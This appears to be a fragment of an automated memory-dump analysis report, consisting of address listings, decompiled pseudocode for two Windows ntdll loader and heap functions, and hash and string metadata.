                                                                                                        0x00aeb6ab
                                                                                                        0x00b32b70
                                                                                                        0x00b32b72
                                                                                                        0x00b32b7d
                                                                                                        0x00b32b7d
                                                                                                        0x00b32b7d
                                                                                                        0x00b32b86
                                                                                                        0x00b32b97
                                                                                                        0x00b32b97
                                                                                                        0x00aeb6b1
                                                                                                        0x00000000
                                                                                                        0x00aeb6b1
                                                                                                        0x00aeb6a0
                                                                                                        0x00aeb67a
                                                                                                        0x00aeb722
                                                                                                        0x00aeb722
                                                                                                        0x00aeb655
                                                                                                        0x00aeb65d
                                                                                                        0x00000000
                                                                                                        0x00aeb5c6
                                                                                                        0x00aeb5c6
                                                                                                        0x00aeb5ce
                                                                                                        0x00b32a83
                                                                                                        0x00b32a97
                                                                                                        0x00b32a97
                                                                                                        0x00b32a9a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32a88
                                                                                                        0x00b32a8a
                                                                                                        0x00b32a8c
                                                                                                        0x00b32a8f
                                                                                                        0x00b32a92
                                                                                                        0x00b32aa1
                                                                                                        0x00b32aa1
                                                                                                        0x00b32aa2
                                                                                                        0x00b32aab
                                                                                                        0x00b32ab0
                                                                                                        0x00000000
                                                                                                        0x00b32ab0
                                                                                                        0x00b32a94
                                                                                                        0x00b32a94
                                                                                                        0x00000000
                                                                                                        0x00b32a9c
                                                                                                        0x00aeb5d4
                                                                                                        0x00aeb5d4
                                                                                                        0x00aeb5d6
                                                                                                        0x00aeb5d9
                                                                                                        0x00aeb5de
                                                                                                        0x00aeb5e1
                                                                                                        0x00aeb5e4
                                                                                                        0x00b32ab8
                                                                                                        0x00b32ab9
                                                                                                        0x00b32ac4
                                                                                                        0x00b32ac9
                                                                                                        0x00aeb5f2
                                                                                                        0x00aeb5f2
                                                                                                        0x00aeb5f4
                                                                                                        0x00aeb5f4
                                                                                                        0x00000000
                                                                                                        0x00aeb5e4
                                                                                                        0x00aeb5c4
                                                                                                        0x00aeb554
                                                                                                        0x00aeb554
                                                                                                        0x00000000
                                                                                                        0x00aeb554

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        • Opcode ID: 66a6ff99f53aa543072ad934eefc26610c5ca1e22168066eafdaef67921761c9
                                                                                                        • Instruction ID: 9f8ef4487429897b93b75402e5e3bb77165b3bd69c5a5393ff51597b9032ffcf
                                                                                                        • Opcode Fuzzy Hash: 66a6ff99f53aa543072ad934eefc26610c5ca1e22168066eafdaef67921761c9
                                                                                                        • Instruction Fuzzy Hash: 81E18970610285EFDB19DF69C899BBAB7F5FB48300F2481A9E4169B291D734ED41CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AD8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E00AD8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00AD934A() != 0) {
								_t159 = E00B4A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xbb5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00B45510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xbb5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00AD849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00AD8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00AD8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xbb5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xbb5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00AE2280(_t92, 0xbb86cc);
															_t94 = E00B99DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00AF61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xbb5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00AD8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xbb5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xbb5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00B0F380(_t136, 0xaa1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00AE2280(_t108, 0xbb86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00AF61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00B99D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00ADFFB0(_t118, _t156, 0xbb86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00B09A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                        0x00ad8799
                                                                                                        0x00ad879d
                                                                                                        0x00ad87a1
                                                                                                        0x00ad87a3
                                                                                                        0x00ad87a8
                                                                                                        0x00ad87c3
                                                                                                        0x00ad87c3
                                                                                                        0x00ad87c8
                                                                                                        0x00ad87d1
                                                                                                        0x00ad87d4
                                                                                                        0x00ad87d8
                                                                                                        0x00ad87e5
                                                                                                        0x00ad87ec
                                                                                                        0x00b29bfe
                                                                                                        0x00b29c00
                                                                                                        0x00b29c02
                                                                                                        0x00b29c08
                                                                                                        0x00b29c0d
                                                                                                        0x00b29c0f
                                                                                                        0x00b29c14
                                                                                                        0x00b29c2d
                                                                                                        0x00b29c32
                                                                                                        0x00b29c37
                                                                                                        0x00b29c3a
                                                                                                        0x00b29c3c
                                                                                                        0x00b29c42
                                                                                                        0x00b29c42
                                                                                                        0x00b29c3c
                                                                                                        0x00b29c02
                                                                                                        0x00ad87da
                                                                                                        0x00ad87df
                                                                                                        0x00ad87e3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad87e3
                                                                                                        0x00ad87f2
                                                                                                        0x00000000
                                                                                                        0x00ad87fb
                                                                                                        0x00ad87fd
                                                                                                        0x00ad87fe
                                                                                                        0x00ad880e
                                                                                                        0x00ad880f
                                                                                                        0x00ad8810
                                                                                                        0x00ad8814
                                                                                                        0x00ad881a
                                                                                                        0x00ad881c
                                                                                                        0x00ad881f
                                                                                                        0x00ad8821
                                                                                                        0x00ad8822
                                                                                                        0x00ad8824
                                                                                                        0x00ad8826
                                                                                                        0x00ad882c
                                                                                                        0x00ad882e
                                                                                                        0x00b29c48
                                                                                                        0x00b29c48
                                                                                                        0x00ad8834
                                                                                                        0x00ad8834
                                                                                                        0x00ad8837
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad8837
                                                                                                        0x00ad882e
                                                                                                        0x00ad883d
                                                                                                        0x00ad8840
                                                                                                        0x00ad8843
                                                                                                        0x00ad8846
                                                                                                        0x00ad8849
                                                                                                        0x00ad884c
                                                                                                        0x00ad884e
                                                                                                        0x00ad8850
                                                                                                        0x00ad8852
                                                                                                        0x00ad8854
                                                                                                        0x00ad8857
                                                                                                        0x00ad88b4
                                                                                                        0x00ad88b6
                                                                                                        0x00ad88b6
                                                                                                        0x00ad8859
                                                                                                        0x00ad8859
                                                                                                        0x00ad8859
                                                                                                        0x00ad8861
                                                                                                        0x00ad8866
                                                                                                        0x00ad886a
                                                                                                        0x00ad893d
                                                                                                        0x00ad8941
                                                                                                        0x00000000
                                                                                                        0x00ad8947
                                                                                                        0x00ad8947
                                                                                                        0x00ad894a
                                                                                                        0x00ad894c
                                                                                                        0x00000000
                                                                                                        0x00ad8952
                                                                                                        0x00ad8955
                                                                                                        0x00ad895a
                                                                                                        0x00ad895d
                                                                                                        0x00ad895d
                                                                                                        0x00ad895f
                                                                                                        0x00ad8961
                                                                                                        0x00ad8961
                                                                                                        0x00ad8968
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad896a
                                                                                                        0x00ad896b
                                                                                                        0x00ad896e
                                                                                                        0x00000000
                                                                                                        0x00ad8970
                                                                                                        0x00ad8970
                                                                                                        0x00ad8970
                                                                                                        0x00ad8970
                                                                                                        0x00ad8972
                                                                                                        0x00ad8972
                                                                                                        0x00ad8974
                                                                                                        0x00000000
                                                                                                        0x00ad897a
                                                                                                        0x00ad897a
                                                                                                        0x00ad897d
                                                                                                        0x00000000
                                                                                                        0x00ad8983
                                                                                                        0x00b29c65
                                                                                                        0x00b29c6d
                                                                                                        0x00b29c72
                                                                                                        0x00b29c75
                                                                                                        0x00b29c75
                                                                                                        0x00b29c82
                                                                                                        0x00b29c86
                                                                                                        0x00b29c87
                                                                                                        0x00b29c88
                                                                                                        0x00b29c89
                                                                                                        0x00b29c8c
                                                                                                        0x00b29c90
                                                                                                        0x00b29c95
                                                                                                        0x00b29c97
                                                                                                        0x00b29ca0
                                                                                                        0x00b29ca3
                                                                                                        0x00b29ca9
                                                                                                        0x00b29ca9
                                                                                                        0x00000000
                                                                                                        0x00b29ca9
                                                                                                        0x00b29ca3
                                                                                                        0x00000000
                                                                                                        0x00b29c97
                                                                                                        0x00ad897d
                                                                                                        0x00000000
                                                                                                        0x00ad8974
                                                                                                        0x00ad8988
                                                                                                        0x00ad8992
                                                                                                        0x00ad8996
                                                                                                        0x00000000
                                                                                                        0x00ad8996
                                                                                                        0x00ad894c
                                                                                                        0x00000000
                                                                                                        0x00ad8870
                                                                                                        0x00ad887b
                                                                                                        0x00ad887d
                                                                                                        0x00ad887f
                                                                                                        0x00ad8881
                                                                                                        0x00ad8884
                                                                                                        0x00ad8884
                                                                                                        0x00ad8886
                                                                                                        0x00ad8889
                                                                                                        0x00ad888c
                                                                                                        0x00ad888e
                                                                                                        0x00ad8891
                                                                                                        0x00ad8891
                                                                                                        0x00ad8898
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad889a
                                                                                                        0x00ad889b
                                                                                                        0x00ad889e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad88a0
                                                                                                        0x00ad88a8
                                                                                                        0x00ad88b0
                                                                                                        0x00ad88b2
                                                                                                        0x00ad88d3
                                                                                                        0x00ad88d5
                                                                                                        0x00000000
                                                                                                        0x00ad88d7
                                                                                                        0x00ad88db
                                                                                                        0x00ad88dc
                                                                                                        0x00ad88e0
                                                                                                        0x00ad88e8
                                                                                                        0x00ad88ee
                                                                                                        0x00ad88f0
                                                                                                        0x00ad88f3
                                                                                                        0x00ad88fc
                                                                                                        0x00ad8901
                                                                                                        0x00ad8906
                                                                                                        0x00ad890c
                                                                                                        0x00ad890c
                                                                                                        0x00ad890f
                                                                                                        0x00ad8916
                                                                                                        0x00ad8917
                                                                                                        0x00ad8918
                                                                                                        0x00ad8919
                                                                                                        0x00ad891a
                                                                                                        0x00ad891f
                                                                                                        0x00ad8921
                                                                                                        0x00b29c52
                                                                                                        0x00b29c55
                                                                                                        0x00b29c5b
                                                                                                        0x00b29cac
                                                                                                        0x00b29cc0
                                                                                                        0x00b29cc0
                                                                                                        0x00b29c55
                                                                                                        0x00ad8927
                                                                                                        0x00ad8927
                                                                                                        0x00ad892f
                                                                                                        0x00ad8933
                                                                                                        0x00000000
                                                                                                        0x00ad88f5
                                                                                                        0x00ad88f5
                                                                                                        0x00000000
                                                                                                        0x00ad88f7
                                                                                                        0x00ad88f7
                                                                                                        0x00ad88fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad88fa
                                                                                                        0x00ad88f5
                                                                                                        0x00ad88f3
                                                                                                        0x00000000
                                                                                                        0x00ad88d5
                                                                                                        0x00000000
                                                                                                        0x00ad88b2
                                                                                                        0x00ad88c9
                                                                                                        0x00000000
                                                                                                        0x00ad88c9
                                                                                                        0x00ad887f
                                                                                                        0x00ad886a
                                                                                                        0x00ad8857
                                                                                                        0x00ad8852
                                                                                                        0x00ad88bf
                                                                                                        0x00ad88bf
                                                                                                        0x00ad87aa
                                                                                                        0x00ad87ad
                                                                                                        0x00ad87ae
                                                                                                        0x00ad87b4
                                                                                                        0x00ad87b5
                                                                                                        0x00ad87b6
                                                                                                        0x00ad87b8
                                                                                                        0x00ad87bd
                                                                                                        0x00ad87c1
                                                                                                        0x00ad87f4
                                                                                                        0x00ad87fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad87c1
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        • LdrpDoPostSnapWork, xrefs: 00B29C1E
                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 00B29C28
                                                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00B29C18
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                        • API String ID: 2994545307-1948996284
                                                                                                        • Opcode ID: c2c948354e3d4b63414d511e03c798812199498a45af99bfa50f5517478e9fef
                                                                                                        • Instruction ID: 45a27b502f9df20896ef026c992267ce8cfa10b728a642c246c0c4604a73e27d
                                                                                                        • Opcode Fuzzy Hash: c2c948354e3d4b63414d511e03c798812199498a45af99bfa50f5517478e9fef
                                                                                                        • Instruction Fuzzy Hash: E3910271A00216AFDF18DF59C881ABEB7B9FF44340B5441AAE806AB351EF74ED01DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E00AFAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00B1D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xbb8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00B096E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00B73C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00B096E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00ACB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00B814FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00AE7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00B81411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00AE7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00B81411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                        0x00afac85
                                                                                                        0x00afac88
                                                                                                        0x00afac8a
                                                                                                        0x00afac8d
                                                                                                        0x00afac91
                                                                                                        0x00afac99
                                                                                                        0x00afac9c
                                                                                                        0x00b39f57
                                                                                                        0x00b39f5b
                                                                                                        0x00b39f60
                                                                                                        0x00b39f60
                                                                                                        0x00afaca8
                                                                                                        0x00afacae
                                                                                                        0x00afacda
                                                                                                        0x00afacde
                                                                                                        0x00aface8
                                                                                                        0x00afaceb
                                                                                                        0x00afacee
                                                                                                        0x00000000
                                                                                                        0x00afacee
                                                                                                        0x00afacf6
                                                                                                        0x00afacb0
                                                                                                        0x00afacb0
                                                                                                        0x00afacbb
                                                                                                        0x00afacbd
                                                                                                        0x00afacc0
                                                                                                        0x00afacc5
                                                                                                        0x00afadae
                                                                                                        0x00afadb4
                                                                                                        0x00afadb4
                                                                                                        0x00afacd4
                                                                                                        0x00afacd8
                                                                                                        0x00afacf9
                                                                                                        0x00afacff
                                                                                                        0x00afad04
                                                                                                        0x00afad08
                                                                                                        0x00afad09
                                                                                                        0x00afad10
                                                                                                        0x00afad12
                                                                                                        0x00afad18
                                                                                                        0x00b39f6f
                                                                                                        0x00b39f74
                                                                                                        0x00b39f76
                                                                                                        0x00b39f7c
                                                                                                        0x00b39f84
                                                                                                        0x00b39f88
                                                                                                        0x00b39f89
                                                                                                        0x00b39f90
                                                                                                        0x00b39f90
                                                                                                        0x00b39f76
                                                                                                        0x00afad1e
                                                                                                        0x00afad24
                                                                                                        0x00afad26
                                                                                                        0x00b3a097
                                                                                                        0x00b3a09b
                                                                                                        0x00b3a0ba
                                                                                                        0x00b3a0bf
                                                                                                        0x00b3a09d
                                                                                                        0x00b3a0b2
                                                                                                        0x00b3a0b7
                                                                                                        0x00b3a0c5
                                                                                                        0x00b3a0c8
                                                                                                        0x00b3a0cb
                                                                                                        0x00b3a0d2
                                                                                                        0x00000000
                                                                                                        0x00afad2c
                                                                                                        0x00afad2c
                                                                                                        0x00afad2f
                                                                                                        0x00afad34
                                                                                                        0x00afad36
                                                                                                        0x00b39f97
                                                                                                        0x00b39f9a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b39fa9
                                                                                                        0x00afad3e
                                                                                                        0x00afad3e
                                                                                                        0x00afad41
                                                                                                        0x00b39fb3
                                                                                                        0x00b39fb9
                                                                                                        0x00b39fc0
                                                                                                        0x00b39fd0
                                                                                                        0x00b39fd0
                                                                                                        0x00b39fc0
                                                                                                        0x00afad4a
                                                                                                        0x00afad50
                                                                                                        0x00afad5c
                                                                                                        0x00afad62
                                                                                                        0x00afad68
                                                                                                        0x00afad6b
                                                                                                        0x00afad6d
                                                                                                        0x00b39fda
                                                                                                        0x00b39fdd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b39fec
                                                                                                        0x00000000
                                                                                                        0x00afad73
                                                                                                        0x00afad73
                                                                                                        0x00afad73
                                                                                                        0x00afad75
                                                                                                        0x00afad75
                                                                                                        0x00afad78
                                                                                                        0x00b39ff6
                                                                                                        0x00b39ffc
                                                                                                        0x00b3a003
                                                                                                        0x00b3a00e
                                                                                                        0x00b3a010
                                                                                                        0x00b3a01b
                                                                                                        0x00b3a01b
                                                                                                        0x00b3a01b
                                                                                                        0x00b3a038
                                                                                                        0x00b3a038
                                                                                                        0x00b3a003
                                                                                                        0x00afad84
                                                                                                        0x00afad89
                                                                                                        0x00afad8c
                                                                                                        0x00afad8e
                                                                                                        0x00b3a042
                                                                                                        0x00b3a045
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3a054
                                                                                                        0x00000000
                                                                                                        0x00afad94
                                                                                                        0x00afad94
                                                                                                        0x00afad94
                                                                                                        0x00afad96
                                                                                                        0x00afad96
                                                                                                        0x00afad99
                                                                                                        0x00b3a063
                                                                                                        0x00b3a065
                                                                                                        0x00b3a070
                                                                                                        0x00b3a070
                                                                                                        0x00b3a070
                                                                                                        0x00b3a08d
                                                                                                        0x00b3a08d
                                                                                                        0x00afada4
                                                                                                        0x00afada6
                                                                                                        0x00000000
                                                                                                        0x00afada6
                                                                                                        0x00afad8e
                                                                                                        0x00afad6d
                                                                                                        0x00afad3c
                                                                                                        0x00afad3c
                                                                                                        0x00000000
                                                                                                        0x00afad3c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00afacd8

                                                                                                        Strings
                                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00B3A0CD
                                                                                                        • HEAP[%wZ]: , xrefs: 00B3A0AD
